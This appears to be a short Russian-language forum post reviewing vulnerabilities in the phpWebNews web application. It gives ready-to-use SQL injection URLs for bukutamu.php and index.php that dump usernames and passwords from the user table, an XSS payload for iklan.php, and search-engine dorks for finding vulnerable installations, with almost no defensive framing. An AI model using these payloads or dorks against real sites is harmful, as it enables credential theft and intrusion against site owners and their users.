![]() |
[ Обзор уязвимостей phpWebNews ]
[ Обзор уязвимостей phpWebNews ] phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability Воздействие: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «det» сценарием bukutamu.php и в параметре «id_kat» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Exploit: Код:
http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*Exploit: Код:
http://site.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--Exploit: PHP код:
Exploit: Код:
www.example.com/[path]/iklan.php?m_txt=<script>alert(/the_Edit0r/);</script>Powered by PHPWebNews Powered by PHPWebNews v1.0 Powered by PHPWebNews v2.0 allinurl:index.php?id_kat= Download phpWebNews: phpwebnews-mysql 0.2 phpwebnews-posgresql 0.1 |
| Время: 11:10 |